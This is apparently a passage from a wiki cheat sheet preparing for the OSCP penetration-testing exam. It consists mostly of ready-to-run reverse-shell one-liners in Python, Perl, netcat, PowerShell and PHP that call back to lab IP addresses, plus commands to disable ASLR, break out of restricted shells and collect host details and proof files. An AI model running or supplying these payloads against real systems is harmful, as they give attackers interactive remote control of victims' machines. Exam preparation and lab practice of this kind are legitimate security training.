 +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.111",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 +
 +__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4433 >/tmp/f')-1\
 +
 +# Perl
 +perl -e 'use Socket;$i="10.11.1.111";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 +
 +# Windows
 +nc -e cmd.exe 10.11.1.111 4443
 +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 +
 +# PHP most simple Linux
 +<?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>
 +</code>
 +
 +
 +
 +
 +**Disable ASLR on linux machine**
 +<code>
 +echo 0 > /proc/sys/kernel/randomize_va_space
 +</code>
 +
 +
 +
 +
 +**Get full shell on jail shelle**
 +<code>
 +python -c “import pty;pty.spawn(‘/bin/sh’);” 
 +echo ‘os.system(‘/bin/bash’)’
 +perl -e ‘exec “/bin/sh”;’
 +</code>
 +
 +
 +
 +
 +** Find and locate the flags  **
 +<code>
 +#Linux:
 +echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
 +find / -name "network-secret.txt"
 +locate "network-secret.txt"
 +
 +#Windows:
 +echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul
 +dir /s /b network-secret.txt
 +</code>
 +
 +
 +**Note template**
 +<code>
 +To work fast use CherryTree to take notes and use this template :
 +https://ceso.github.io/files/oscp/template_pwk.ctb
 +</code>
 +
oscp_survival_guide.txt · Dernière modification: 2021/02/06 22:47 par M0N5T3R